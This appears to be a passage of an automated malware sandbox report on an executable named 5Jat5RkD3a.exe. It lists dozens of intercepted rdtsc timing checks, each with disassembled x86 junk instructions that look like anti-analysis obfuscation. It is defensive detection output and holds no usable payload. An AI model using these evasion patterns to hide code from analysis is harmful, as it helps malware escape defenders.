Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E7DE second address: B4E7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E7E8 second address: B4E82A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007FD934C4561Ah 0x0000000e mov ecx, dword ptr [ebp+122D2932h] 0x00000014 pop edi 0x00000015 lea eax, dword ptr [ebp+12482551h] 0x0000001b jmp 00007FD934C45629h 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E82A second address: B4E830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E830 second address: B4E834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E834 second address: B34C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007FD934BC97DCh 0x00000010 jl 00007FD934BC97DCh 0x00000016 jno 00007FD934BC97D6h 0x0000001c popad 0x0000001d nop 0x0000001e sub dword ptr [ebp+122D2E31h], eax 0x00000024 add edi, 46B0BA7Fh 0x0000002a call dword ptr [ebp+124545C2h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 jc 00007FD934BC97D6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E907 second address: B4E90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E90D second address: B4E911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E911 second address: B4E92E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45622h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4EEB4 second address: B4EF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007FD934BC97E8h 0x0000000f pop edi 0x00000010 jmp 00007FD934BC97DBh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jns 00007FD934BC97E8h 0x00000020 pop eax 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FD934BC97D8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b and edx, 466FC953h 0x00000041 mov edi, dword ptr [ebp+122D2ABEh] 0x00000047 push 0821FC35h 0x0000004c pushad 0x0000004d jg 00007FD934BC97D8h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4EF3E second address: B4EF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4EF42 second address: B4EF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4F31D second address: B4F372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007FD934C4561Ch 0x0000000e mov edi, dword ptr [ebp+122D1BA0h] 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD934C45618h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD934C45620h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4F372 second address: B4F37C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4F766 second address: B4F787 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007FD934C45621h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4F787 second address: B4F7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 0000001Eh 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FD934BC97D8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 or dword ptr [ebp+12450E5Bh], edi 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jns 00007FD934BC97D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B35702 second address: B3571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnl 00007FD934C4561Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3571A second address: B35727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FD934BC97D8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B850C9 second address: B850CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B850CE second address: B85107 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FD934BC97D6h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jno 00007FD934BC97D6h 0x00000011 jbe 00007FD934BC97D6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b pushad 0x0000001c jmp 00007FD934BC97DEh 0x00000021 ja 00007FD934BC97D6h 0x00000027 popad 0x00000028 js 00007FD934BC97DEh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8554D second address: B85551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B85851 second address: B8586E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD934BC97D6h 0x0000000a jg 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97DCh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8586E second address: B85873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B85873 second address: B8587B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8587B second address: B85881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8B0FE second address: B8B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FD934BC97D6h 0x0000000c popad 0x0000000d ja 00007FD934BC97D8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B89FA5 second address: B89FAF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934C45616h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8A4E9 second address: B8A4ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8A4ED second address: B8A4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8A4F3 second address: B8A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B89CE9 second address: B89CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B8AE57 second address: B8AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD934BC97DAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B9471D second address: B9473E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007FD934C45622h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B948A4 second address: B948A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B948A8 second address: B948C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FD934C45620h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B94BB9 second address: B94BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B94FCF second address: B94FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B95291 second address: B95299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B95299 second address: B9529D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B9529D second address: B952A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B953F8 second address: B953FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B953FF second address: B95428 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934BC97DEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007FD934BC97D6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD934BC97E5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B956A1 second address: B956A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B956A5 second address: B956C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD934BC97E9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B956C4 second address: B956D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B983B6 second address: B983C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD934BC97D6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B983C6 second address: B983CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B98100 second address: B98105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B9ACF1 second address: B9AD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45626h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B9AD0D second address: B9AD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD934BC97E3h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FD934BC97DCh 0x0000001c popad 0x0000001d jp 00007FD934BC97DEh 0x00000023 pushad 0x00000024 popad 0x00000025 jne 00007FD934BC97D6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1222D second address: B1223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FD934C45616h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA0761 second address: BA076B instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA076B second address: BA0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA0775 second address: BA077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA08D7 second address: BA08DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA0D63 second address: BA0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FD934BC97D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B09AE2 second address: B09AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA40F4 second address: BA4111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD934BC97E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA43D3 second address: BA43D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA43D9 second address: BA43F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FD934BC97D6h 0x0000000c popad 0x0000000d jmp 00007FD934BC97E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA43F8 second address: BA4408 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45618h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA4558 second address: BA456E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD934BC97DEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA46DE second address: BA46FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD934C45622h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA486E second address: BA4888 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD934BC97E0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA49C6 second address: BA49DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAA379 second address: BAA37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAA37F second address: BAA385 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B08187 second address: B0818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CCA second address: BA8CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CD0 second address: BA8CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8CD8 second address: BA8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8E18 second address: BA8E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA8E1E second address: BA8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 popad 0x0000000a jmp 00007FD934C45629h 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007FD934C45622h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FD934C45616h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA915E second address: BA9198 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD934BC97EFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD934BC97E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA930E second address: BA934C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45626h 0x00000009 pop eax 0x0000000a jp 00007FD934C4561Ch 0x00000010 jmp 00007FD934C4561Dh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA934C second address: BA9351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA962A second address: BA9647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45628h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9647 second address: BA964D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA964D second address: BA9653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9653 second address: BA965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA965D second address: BA9661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BA9661 second address: BA9665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE33 second address: BAFE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE39 second address: BAFE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFE42 second address: BAFE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD934C45616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFFDA second address: BAFFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BAFFE0 second address: BB0023 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934C45616h 0x00000008 jmp 00007FD934C45624h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FD934C4561Ch 0x00000019 jmp 00007FD934C45625h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB04D9 second address: BB04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FD934BC97E3h 0x0000000d jg 00007FD934BC97D6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB07B5 second address: BB07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
